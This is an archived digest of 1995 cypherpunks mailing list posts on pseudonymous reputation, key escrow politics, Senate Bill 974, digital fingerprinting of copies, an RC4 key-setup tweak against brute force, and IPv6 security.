From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 10 Sep 95 17:20:39 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: question about reputation
In-Reply-To: <199509102310.TAA00342@bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950910164221.8377C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Sep 1995, Adam Shostack wrote:

> 	Good question, but a quick modification allows for effective
> bootstrapping.  If I want to start consulting for Amalgameted
> Consolodated, I can offer them a 10 free questions deal to bootstrap
> things with.  Mallet can only cheat if my offer was broadcast.  (I 
> presume that Amalagated' keys are somehow strongly verified, and the
> negotiantions are kept secret from Eve and Mallet.)

This scheme doesn't quite work.  (Let's call Amalgameted Bob, to keep
names short.)  Bob can create a new, unlinkable pseudonym and give the same
offer to Carol under the new pseudonym.  Then, Bob acts as Mallet and
passes messages back and forth between Alice and Carol.  At the end of the
10 free questions, Bob terminates its contract with Alice, leaving Alice
with nothing and Bob's pseudonym a certain amount of reputation with
Carol. 

> 	There might also be fingerprinting technologies that allow me
> to embed a signature in the documents returned to clients that would
> allow me to show that Mallet stole them.  (Which might, incidentally,
> get Mallet a job in some circles...If thats known, Bob and Alice can
> collude to make it appear that Bob was Mallet, and thus forge a
> reputation.

Fingerprinting may be useful in some situations, but is clearly not a
perfect solution to this problem.  Alice may be able to prove to Mallet's
customers that she originally wrote the answers, but if their
communications with Mallet are private, how does Alice even know who those
customers are?  Also, I'm not too familiar with fingerprinting
technologies, but Mallet may be able to remove the identifying marks by
translating the answers to a different form while preserving the meaning.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Trost <trost@cloud.rain.com>
Date: Sun, 10 Sep 95 18:14:07 PDT
To: cypherpunks@toad.com
Subject: NIS&T Key Escrow Export kangaroo conference
Message-ID: <m0srxRp-00004yC@cloud.rain.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat Farrell's summary of the NIS&T conference (thanks for the report,
by the way!) discussed a bunch of "criteria" that an "acceptable" GAK
system should provide, including a couple that are supposed to limit
the ability of law enforcement to use keys beyond the bounds of the
search warrant.

Another criterium that needs to be brought up (although I'm not sure
of how one would phrase in a way that is either clean or polite) comes
out of a debate between Philip Zimmermann and Dorothy Denning I ran
across at one point: "How can a GAK system be arranged so that some
future Congress cannot destroy the protections of the split-"escrow"
system by issuing a resolution like 'All key components of suspected
Comm^H^H^H^H terrorists shall be provided to the House Committee on
Unamerican Activities'?"

The links to McCarthyism are important here.  GAK proponents can't
claim this kind of thing won't happen -- it *has* happened, and could
easily happen again.  Anyone who claims otherwise is either terribly
naive or is being outright misleading.

In some sense, this criterium goes to the very heart of the whole GAK
question -- even if you believe in the allegedly legitimate power of
law enforcement to look through people's love letters, the "safety
mechanisms" for the keys are nothing more than a set of flimsy
policies that Congress could toss aside the next time something scary
comes along.  The protections that the GAK proponents are proposing
(and proponing (-: ) are frightfully ephemeral.

By the way, I'm a few days behind, so sorry if this is "old mail".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Sun, 10 Sep 95 16:47:01 PDT
To: cypherpunks@toad.com
Subject: Senate Bill 974?
Message-ID: <Pine.BSI.3.91.950910183148.5633A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


	
Haven't seen it discussed here, but the August 28, 1995 issue of Lan
Times covers Sen. Charles Grassley's (R-IOWA) Senate Bill 974.
Frankly, you should probably read the text of the bill itself,
because the article doesn't seem to get the facts straight.

The article asserts first that the bill may outlaw any non-GAK
encryption, but then quotes the senator as saying ``All my
bill does is say you can't use computers to steal, to threaten
others or conceal criminal conduct.''  Perhaps concealing
criminal conduct is considered using non-GAK.  The quote from
the bill itself reads like the ITAR; it is illegal to ``distribute
computer software that encodes or ecrypts electronic or digital
communications to computer networks that the person knows, or 
reasonably should know, is accessible to foreign nationals and
foreign governments, regardless of whether such software has been
designated as nonexportable."


The article also says that up to 64 bit keys may now be allowed
in exportable software, but that ``some experts'' suggest
that those keys may have to be GAK.  I've never heard anything
BUT the keys would have to GAK.


David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 10 Sep 95 18:57:48 PDT
To: cypherpunks@toad.com
Subject: Digital Fingerprinting
Message-ID: <v02120d07ac79452480e1@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



A couple of threads have recently touched on aspects
of "digital fingerprinting", a term that covers a variety
of methods for making changes to digital documents in
order to trace the origin of illicit copies. This subject
has been on my mind after several discussions on this topic
at Crypto, as well as the one formal presentation on the
subject.

Here are some of my thoughts on this subject:

  o If the domain of changes is well understood, and can be
    altered without significant loss of quality, then it is
    trivially easy to remove the fingerprinting. In other words,
    if you know the algorithm used to create the fundamental
    codewords in the fingerprint, and you can overwrite
    arbitrary codeword bits with other codeword bits, then the scheme
    can be avoided without collaboration of any kind.

    Example: A software company fingerprints its software by
    mapping two equivalent machine instructions onto binary "0"
    and "1", respectively. Someone who knows about this could
    randomly replace one instruction with the equivalent one,
    which would reduce the fingerprint to noise.

    Example: A publishing company uses an even number of points
    between paragraphs to indicate "0" and an odd number of
    points to indicate "1". Someone who understands this can
    overwrite the fingerprint as above.

  o If a fingerprinting scheme depends on the secrecy of an algorithm,
    then this is really "security by obscurity", which may
    be effective for a period of time, but is likely to meet
    the fate of most copy protection schemes that have rested
    on raw obscurity.

  o Certain domains of information lend themselves to the
    secure formation of fingerprint "bits" that are very difficult
    to scrub in this way. One such scheme was used as the basis
    for the presentation at Crypto: imagine that a film was shot
    with two (or N) cameras. For each frame of the film, the
    distributor can chose to take a frame from a different
    camera. Frames from camera 0 would be mapped onto binary "0",
    frames from camera 1 would be mapped onto binary "1". Using
    this approach it is possible to construct schemes that are
    resistant to collaboration up to "N" people.

    The security of such schemes rests on the assumption
    that given one frame, it is very hard (and possibly intractable)
    to fuzz up the frame such that the parallax information doesn't
    give away which camera shot the frame. Rather than hiding the
    fingerprint information in the "low bits", this technique hides
    the information throughout the picture.

    In one sense, a 2D picture of a 3D object is similar to a one-
    way hash function. It is a form of lossy compression on the 3D
    object that is impractical to work backwards.

  o Note that overwriting a fingerprint with random noise (or
    whatever) does not generate a valid replacement fingerprint.
    Therefore it would still be possible to tell that a document
    had been tampered with (and was not a valid copy), even if
    its provenance could not be determined.

  o A number of people are working on "black box" viewer technology,
    which would allow people to purchase documents that could only
    be read on devices with tamper-resistant hardware in them that
    would be required to decrypt media. Certainly much piracy could
    be done by capturing the output of such a box (unless it was
    embedded in a tamper-resistant chasis); there are some proposed
    schemes for reducing the payoff of output capture, but they
    depend on a similar approach to the movie fingerprinting idea
    above -- the base data format is somehow richer, possibly capable
    of generating different output under different circumstances or
    on different hardware platforms, while the output of the black
    box represents only one view of the base data.

    Example: a base format for a 3D object is encrypted with a
    public key resident in the "black box". Said black box also
    includes a hardware 3D rendering engine. The output of the
    black box consists of a series of 2D frames, which may make
    it impractial to reproduce the base 3D object.

    It is my considered opinion that this sort of technology will
    meet with tremendous customer resistance, and will not prove
    practical or cost-effective; many analysts are predicting a
    trend toward more general purpose computers for media viewing
    rather than towards specialized hardware that is needed for
    this kind of approach.

  o There are also some profound practical and legal problems with
    the use of digital fingerprinting. For one thing, it involves
    generating a unique copy of every document for each consumer.
    After the digitial fingerprinting session at Crypto, a guy from
    Microsoft was pointing out the incredible difficulties posed
    by trying to fingerprint, say, every copy of Windows 95.

    On the legal front, it's not clear what you can do to someone
    even if you _can_ prove that the 100,000 pirate copies of Windows
    95 circulating in Amsterdam stemmed from his copy. Machines get
    hacked, co-workers and family members often have free access to
    machines running software -- it's not clear that media companies
    _want_ to invoke the paranoia associated with potential responsibility
    for millions of dollars in damages if someone makes an illegal copy
    of one's software and the loaves and fishes ensue. [Imagine what
    great revenge this would make for jealous co-workers, ex-wives, etc.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 10 Sep 95 15:57:18 PDT
To: Wei Dai <weidai@eskimo.com>
Subject: Re: question about reputation
In-Reply-To: <Pine.SUN.3.91.950910145610.8377A-100000@eskimo.com>
Message-ID: <9509102257.AA28992@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Wei wrote:

|> In an economy based on positive reputations, how does one acquire a 
|> reputation capital?  One way may be to initially perform services at a 
|> price below cost, but this has some problems.

|> For example, Alice starts a anonymous consulting service, and announces 
|> that she will answer the first ten queries for free.  Upon hearing this, 
|> Mallet immediately starts another consulting service, and announces the 
|> same offer.  At this point Mallet can simply forward his customers' 
|> queries to Alice and Alice's answers back to his customers.  Thus, he gains 
|> reputation at no cost.

A) There is a real cost (some combination of reputation and other capital)
   involved in attracting customers.

B) This is emphatically _not_ an "abuse" of reputation capital. Mallet will
   acquire a reputation based on the quality of the service he provides.
   Suppose that Bob also set up a service like Alice. Some people would
   go directly to Alice, some to Bob, and some to Mallet who chooses
   which ever of Alice and Bob offers the best deal for the customer.
   By choosing intelligently, Mallet could acquire a better reputation
   than either Alice or Bob. This would not be inaccurate. By using Mallet,
   (now a consulting services broker) the customers are geting a better deal.
   (i.e. MAX(A(x),B(x)) is greater than or equal to both A(x) and B(x)).

JWS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sun, 10 Sep 95 19:02:06 PDT
To: cypherpunks@toad.com
Subject: Re: 64 bit crypto
Message-ID: <199509110157.SAA01073@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



John A. Limpert says:
> Why would the attacker need to run the key setup 65536 times?

I could have been more clear.

Forgive a little bit of code...

Here is the beginning of the alleged RC4:
		for(counter = 0; counter < 256; counter++)
					state[counter] = counter;
        index2 = 0;
        key->x = key->y = index1 = index2 = 0;
        for(counter = 0; counter < 256; counter++)
        {
                index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
                swap_byte(&state[counter], &state[index2]);

                index1 = (index1 + 1) % key_data_len;
        }

If it was changed to

		for(counter = 0; counter < 256; counter++)
                    state[counter] = counter;
        key->x = key->y = index1 = index2 = 0;
		for(i = 0; i < 65536) {	/* stir the pot a long time */
			for(counter = 0; counter < 256; counter++)
			{
					index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
					swap_byte(&state[counter], &state[index2]);

					index1 = (index1 + 1) % key_data_len;
			}
		}

Then the prepare_key routine would take much much longer.

The idea is that a 64 bit crypto routine can be arbitrarily
secure against brute-forcing, if you are willing to pay a
runtime penalty every time you use it.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sun, 10 Sep 95 16:04:04 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: not a flame please read and think about this
Message-ID: <9509102303.AA13613@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>I was kind of wandering if it would be necessary to patent something
>just to ensure someone else did patent *your* idea, if you came up
>with one.

Nope.

>Or can you publish, and then say that's prior art, so no one else can
>go patent your idea.

This works.  IBM used to have publish a monthly journal (I forget the
name, it came out of one of their Yorktown labs) that did exactly this
kind of thing for exactly this kind of reason.  ACtually, they wrote
about stuff that they thought was 5-10 years away.

>> even phil zimmerman is selling the rights to pgp. what about all the
>> people who contributed code (like me) ... . ask phil
>> about me and when i asked about sharing profits from the code i
>> conrtibuted. also about the deal with r.f...

Mr/Ms. Anonymous is lying.  His/her name appears nowhere in the credits,
and his/her code appears nowhere in any PGP release.  Don't waste any
neurons on it.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 10 Sep 95 16:10:30 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: Re: question about reputation
In-Reply-To: <Pine.SUN.3.91.950910145610.8377A-100000@eskimo.com>
Message-ID: <199509102310.TAA00342@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	Good question, but a quick modification allows for effective
bootstrapping.  If I want to start consulting for Amalgameted
Consolodated, I can offer them a 10 free questions deal to bootstrap
things with.  Mallet can only cheat if my offer was broadcast.  (I 
presume that Amalagated' keys are somehow strongly verified, and the
negotiantions are kept secret from Eve and Mallet.)

	There might also be fingerprinting technologies that allow me
to embed a signature in the documents returned to clients that would
allow me to show that Mallet stole them.  (Which might, incidentally,
get Mallet a job in some circles...If thats known, Bob and Alice can
collude to make it appear that Bob was Mallet, and thus forge a
reputation.


Wei wrote:
| In an economy based on positive reputations, how does one acquire a 
| reputation capital?  One way may be to initially perform services at a 
| price below cost, but this has some problems.
| 
| For example, Alice starts a anonymous consulting service, and announces 
| that she will answer the first ten queries for free.  Upon hearing this, 
| Mallet immediately starts another consulting service, and announces the 
| same offer.  At this point Mallet can simply forward his customers' 
| queries to Alice and Alice's answers back to his customers.  Thus, he gains 
| reputation at no cost.
| 
| On the other hand, this "man-in-the-middle" attack can also work against
| conventional True Name based services, but perhaps with less effect.  Has
| anyone ever heard of this being done? 
| 
| Is there a better way to acquire a good reputation?
| 
| Wei Dai
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Sun, 10 Sep 95 17:25:06 PDT
To: cypherpunks@toad.com
Subject: Senate Bill 974
Message-ID: <Pine.BSI.3.91.950910190644.6485A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain



Senate Bill 974

The full text is difficult to interpret since it mostly just amends
other law. Essentialy the law makes illegal: using a computer for
racketeering purposes, threatening to destroy data, transferring
of unlicensed software, using any method to hide illegal funds
transfer, and exporting crypto software. (Relavent bits are included  below).
The law also expands wiretapping authority, and seems to allow electronic
evidence found during a search to be introduced as evidence.  You'll
have to insert the text of the bill into the real laws to get full
context.


                `(2) to distribute computer software that encodes or encrypts
              electronic or digital communications to computer networks that
              the person distributing the software knows or reasonably should
              know, is  accessible  to  foreign  nationals  and  foreign
          governments, regardless of whether such software has been 
          designated as nonexportable;
                `(3) to use a computer or computer network to transmit a
              communication intended to conceal or hide the origin of money 
              or other assets, tangible or intangible, that were derived from
              racketeering activity; and
                `(4) to operate a computer or computer network primarily to
              facilitate racketeering activity or primarily to engage in
              conduct prohibited by Federal or State law.
            `(b) For purposes of this section, each act of distributing
          software is considered a separate predicate act. Each instance in
          which nonexportable software is accessed by a foreign government, 
          an agent of a foreign government, a foreign national, or an agent 
          of a foreign national, shall be considered as a separate predicate
            `(c) It shall be an affirmative defense to prosecution under this
          section that the software at issue used a universal decoding device
          or program that was provided to the Department of Justice prior to
          the distribution.'.


David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 10 Sep 95 19:31:44 PDT
To: cypherpunks@toad.com
Subject: Re:  Digital Fingerprinting
Message-ID: <199509110229.TAA11621@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm not sure how to do it for software, but for novels it should be easy
to fingerprint.  Every couple of pages the author writes a sentence twice
in different forms.  This would not take a great deal of extra effort on
the part of the author.  Software can then choose from the alternative
variations in different patterns to produce a unique fingerprint for
every copy.

There would seem to be two approaches to removing the fingerprint.
One would be re-writing every sentence in the novel.  The other would be
to collect enough copies to identify all of the sentences which have
variations.  Most of the mathematics of fingerprinting research is
oriented around figuring out how many different points of variation there
must be to be secure against a certain number of copies of the
fingerprinted item being compared.

Perhaps a similar approach could be applied to software, where in many
cases a couple of statements could be trivially interchanged, or other
kinds of simple transformations could be manually generated.  Those
could be marked by the programmers without too much extra work.

I agree with Doug that fully automated fingerprinting schemes which post
process "vanilla" documents are going to be forced to rely on security
through obscurity, probably a losing battle.  Also as Doug says the
viability of legal sanctions against the source of fingerprinted docs is
questionable.  Maybe it could work if you had just a few copies out and
the people who were given copies can be seriously held to non-disclosure
agreements.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Sun, 10 Sep 95 17:06:34 PDT
To: "cypherpunks@toad.com>
Subject: RE: 64 bit crypto
Message-ID: <01BA7FB7.8CF32E40@dialin36.annex1.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


Couldn't we modify RC4 easily to provide the same
security against brute-force attacks by just running the key-setup phase
65536 times instead of just once?

Why would the attacker need to run the key setup 65536 times?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 10 Sep 95 17:10:11 PDT
To: cypherpunks@toad.com
Subject: IP6_pi2
Message-ID: <199509110010.UAA29842@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   IEEE Spectrum, September, 1995:


   Excerpt on Net security from "Upgrading the Internet," a
   roundtable discussion of the Internet Society on the next
   generation of Internet protocols, IP Version 6.

   Discussants: Vinton Cerf, Stephen Deering, Christian
   Huitema, Haruhisa Ishida, Larry Landweber, Eric Schmidt,
   Lixia Zhang.

      A most important aspect of the IPv6 is the somewhat
      controversial decision to require that all v6
      implementations support strong privacy and strong
      authentication. At this level, all of the security
      problems won't be solved, but we can authenticate and
      maintain privacy of packets that flow from one machine
      to another. This will eliminate many security threats in
      the current Internet, such as source-address-spoofing,
      source-related routing attacks, password sniffing,
      connection hijacking, and so on.


   New Scientist, Sept 9, 1995: "Watching you, watching us."

      Companies that sell electronic surveillance equipment to
      repressive regimes face the prospect of being "outed" on
      the Internet this autumn. Two electronic watchdogs, the
      British group Privacy International (PI) and its
      American sister organisation the Electronic Privacy
      Information Centre (EPIC), are setting up an offshore
      Internet site that will name companies that sell
      electronic instruments of repression to governments with
      poor records on human rights.


   IPI-pair: IP6_pi2 (13kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Sep 95 20:26:09 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <ac78f5a804021004b64e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Many interesting points here...but I'll stick to just one:

At 2:56 AM 9/11/95, Douglas Barnes wrote:

>    On the legal front, it's not clear what you can do to someone
>    even if you _can_ prove that the 100,000 pirate copies of Windows
>    95 circulating in Amsterdam stemmed from his copy. Machines get
>    hacked, co-workers and family members often have free access to
>    machines running software -- it's not clear that media companies
>    _want_ to invoke the paranoia associated with potential responsibility
>    for millions of dollars in damages if someone makes an illegal copy
>    of one's software and the loaves and fishes ensue. [Imagine what
>    great revenge this would make for jealous co-workers, ex-wives, etc.]

If a piece of mail addressed to me is found littering the highway, can I be
convicted of littering? No, because the _provenance_ of that item of mail
cannot be determined...it might have accidentally blown out of a trash
truch delivering my mail to the dump, for example.

Ditto for most schemes to serialize software. As Doug notes, the offending
item might have been copied when I wasn't looking, copied by my girlfriend
when I was away, or even copied at the factory or at the software store
prior to my gaining control. Or copied after I discarded it.

(Requiring owners of Microsoft Word to treat it like a state secret--more
on state secrets in a minute--is impractical and unenforceable.)

One thing serialization could do is to allow proof that a distributor had
not acquired a particular copy/instance through normal channels. But it's
usually obvious anyway when Joe's Really Cheap Warez has 200 copies of
Microsoft Word, all with the same serial number.

The "light signatures" scheme I've written about here could be used to
authenticate the distribution media itself, though not the installed copies
of course. (This would be like the Microsoft hologram, except in spades.)
Since the technology for this is not available to home or business users, I
don't see this as a viable approach.

Another thing that could work to foil mass counterfeiters is to serialize
the diskettes and include a hash of the serial number, as some lottery
tickets now include. Counterfeiters could try two basic approaches:

1. Make up their own numbers. But they could not compute a valid hash, as
they lacked the (presumably secret) knowledge to do so. With public key
approaches, a customer could "authenticate" that at least Microsoft, say,
must have generated the number.

(This doesn't take care of multiple copies of the same serial number, which
takes us to:)

2. Multiple copies of a single, valid serial number. Here, the
counterfeiter directly copies both the serial number and its hash.

(This approach doesn't work to counterfeit lottery tickets. The reason is
left as an exercise for the reader.)

One way I can think of to head this off is to have a registry of "taken" or
"sold" numbers, in which serial numbers are deposited. A purchaser could
consult this data base to see if the number on the package he is planning
to buy is already registered. (There are complications about time delays,
and so forth, but this would eventually limit multiple same number
packages.)

This discussion assumes that purchasers are interested in getting valid,
non-counterfeit programs. Many are not, of course. Certain types of
programs pretty much require support by the vendor, others don't. A
standard discussion topic.

I said I'd mention "state secrets" again. The usual example for making
subtle modifications to documents to see who leaked it is the intelligence
community, which gave us the term "barium" (because the changes look like
barium in an x-ray diagnostic).

In that case, the agencies can enforce their laws in a draconian way,
sometimes merely by suspicion. And the workarounds we discuss, of DIFFing
the files, are unlikely to be practical. ("Hey, Sid, can I borrow your copy
of "Covert Operations in Bosnia" so I can DIFF it with my copy?")

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 10 Sep 95 17:58:13 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Senate Bill 974?
In-Reply-To: <Pine.BSI.3.91.950910183148.5633A-100000@usis.com>
Message-ID: <9509110058.AA24206@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Neal writes:
> Haven't seen it discussed here, but the August 28, 1995 issue of Lan
> Times covers Sen. Charles Grassley's (R-IOWA) Senate Bill 974.

Actually, we considered S.974 (the Anti-Electronic Racketeering Act of 1995)
here in excruciating detail a couple of months ago. Check the archives from
e.g. July.

At last report, the bill had been referred to committee. If/when it ever
emerges from subcommittee, there's cause for concern. No mention of it has
been made in the Congressional Record since Sen. Jon Kyl of Arizona joined
as a cosponsor in late July. It doesn't currently appear on the unofficial
list of "hot bills" on Thomas -- "bills that have received or are receiving 
floor action and/or debate in the United States Congress" 
(http://thomas.loc.gov/home/hot-bill.html)  Hopefully it has died in
committee, as more pressing matters have taken precedence.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 10 Sep 95 17:59:31 PDT
To: cypherpunks@toad.com
Subject: Re: IP6_pi2
In-Reply-To: <199509110010.UAA29842@pipe2.nyc.pipeline.com>
Message-ID: <199509110059.UAA11623@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



This was a very controversial move that Jeff Schiller had the
foresight to drive through. There are still arguments about it, but
overall it was a "good thing".

.pm

John Young writes:
>    Excerpt on Net security from "Upgrading the Internet," a
>    roundtable discussion of the Internet Society on the next
>    generation of Internet protocols, IP Version 6.
> 
>    Discussants: Vinton Cerf, Stephen Deering, Christian
>    Huitema, Haruhisa Ishida, Larry Landweber, Eric Schmidt,
>    Lixia Zhang.
> 
>       A most important aspect of the IPv6 is the somewhat
>       controversial decision to require that all v6
>       implementations support strong privacy and strong
>       authentication. At this level, all of the security
>       problems won't be solved, but we can authenticate and
>       maintain privacy of packets that flow from one machine
>       to another. This will eliminate many security threats in
>       the current Internet, such as source-address-spoofing,
>       source-related routing attacks, password sniffing,
>       connection hijacking, and so on.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew.spring@ping.be (Andrew.spring@ping.be)
Date: Wed, 20 Sep 95 17:18:23 PDT
To: cypherpunks@toad.com
Subject: RE: BIZDOS CITIZENSHIP?
Message-ID: <9509201549586314@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sun, 10 Sep 1995 22:11:28 +0100
To: cypherpunks@toad.com
From: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: Bizdos citizenship?

-----BEGIN PGP SIGNED MESSAGE-----

>In correspondence with someone outside the US regarding ITAR regulations,
the remark was made that Jim Bizdos was Greek and not a U.S. citizen.  Is
this statement in the same class as an Elvis sighting?  Or if it is true,
what impact would ITAR have on foreign nationals working for a US company
involved with export restricted crypto?
>
>Please don't get carried away and turn this into a Net rumor.  I'm just
curious if anyone on the list can confirm or deny the citizenship comment.

Jim Bidzos is a US Permanent Resident Alien and Greek citizen.  He has a
Green Card.  It doesn't have any ITAR impact, since the ITAR term 'Foreign
Person' doesn't include Green Carded Resident Aliens.

It probably wouldn't have any impact anyway, since he's a business weenie,
and not a software weenie.  Now, if he had a _programmer_ that wasn't a US
Citizen, that would be a-whole-nother kettle of fish.

He's previously stated that he would become a US Citizen, if it were not for
the fact that Greece would require him to give up his Greek (and hence his
EC) citizenship.  See Simson Garfinkle's book on PGP for more details.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFMZFI4k1+54BopBAQGK7gP+Oq+FjqjCeQziC16Ryq64i1tXMAhV/jaX
86TBumss/GPpaVfLGtDS3FZARK9eTo4gVPTfABtvIa/u6QzZGL9zCT5z5nWT5QJ4
Koj5jnGsnNpXx3YGa1bJfZOI4ctkRovPWpyPa4jWOEooJz5UbvCCwGW/YoYMlvCs
sQ//Qs7uDPs=
=ARLj
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous
Date: Tue Sep 07 12:51:07 1999
Subject: No Subject
Message-ID: <d41d8cd98f00b204e9800998ecf8427e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


  Hal Finney wrote:

> I'm not sure how to do it for software, but for novels it
> should be easy to fingerprint.  Every couple of pages the
> author writes a sentence twice in different forms.  This would
> not take a great deal of extra effort on the part of the
> author.

  Perhaps.  Some authors might be offended by the idea that
using a different form of a sentence doesn't affect the work.

> Perhaps a similar approach could be applied to software, where
> in many cases a couple of statements could be trivially
> interchanged, or other kinds of simple transformations could
> be manually generated.  Those could be marked by the
> programmers without too much extra work.

  Sounds like a disaster to me, unless it can be done
automatically, by a proven-correct program.  I used to use
commercial compilers that (at least claimed to) put their
"stamp" on the assembly code they generated, so they could sue
if you released a product without having a license for the
compiler.  Bugs are bad enough as it is; we don't need extra
ones that only show up in some copies!


Will French  <wfrench@interport.net>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 10 Sep 95 18:55:45 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: question about reputation
In-Reply-To: <Pine.SUN.3.91.950910145610.8377A-100000@eskimo.com>
Message-ID: <9509110155.AA25082@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:
> On the other hand, this "man-in-the-middle" attack can also work against
> conventional True Name based services, but perhaps with less effect.  Has
> anyone ever heard of this being done? 

Undoubtedly -- this is a factor in the abundance of "no sales to dealers"
and "limit N per customer" in sales advertisements. 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sun, 10 Sep 95 22:05:43 PDT
To: weidai@eskimo.com
Subject: Re: question about reputation
Message-ID: <199509110502.AA29554@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Wei Dai writes:

> For example, Alice starts a anonymous consulting service, and announces 
> that she will answer the first ten queries for free.  Upon hearing this, 
> Mallet immediately starts another consulting service, and announces the 
> same offer.  At this point Mallet can simply forward his customers' 
> queries to Alice and Alice's answers back to his customers.  Thus, he gains 
> reputation at no cost.

Well, long term he won't be able to keep it - what will he do when Alice
starts charging for her services? He can charge more than she does, and
they'll have equivalent "accuracy ratings" but Alice will provide her
services more cheaply - or he can stop asking Alice and make up his own
answers (or not answer) and his repuation will drop quickly. 

While I admit that I'd be pissed off if I were Alice, Mallet isn't
really harming her - she gets business at the rate she's established.
If Mallet's customers and Alice's don't overlap (maybe Mallet speaks/
writes in a different language, or has different friends) then it's
arguable that Mallet is doing Alice a favor. If Mallet continues to
purchase answers from Alice (even if he charges his customers more)
his reputation isn't really false, if you think of it as meaning
"can provide good answers to questions" versus "can figure out good
answers to questions by himself". 

More proactively, Alice might choose to publish the questions and 
answers publically (the customers are, after all, anonymous,
and only revealing as much about themselves as they'd reveal to an
unknown party - Alice could sanitize the questions of identifying
facts even further, if appropriate) - this would prove her aptitude 
(or lack thereof) to a wider audience, and Mallet's customers could
notice that she was providing answers to their questions (how did
she know of their questions?) before Mallet does. 

Alice could also choose to answer questions for free, but only to
named and well-known parties with good reputations. This is a 
standard trick for new consultants/businesses - work cheap or free
for a person or business that comes in contact with many people or
gets lots of publicity. Cochran, Shapiro, et al could make a fortune
from the Simpson trial even if they didn't charge OJ a dime - 
people charged with serious crimes will be calling them for years to
come because of their media exposure. If Alice is paranoid, the 
well-known party could post a bond with an escrow agent, to be 
returned when they posted a public evaluation of Alice's services. 

> On the other hand, this "man-in-the-middle" attack can also work against
> conventional True Name based services, but perhaps with less effect. Has
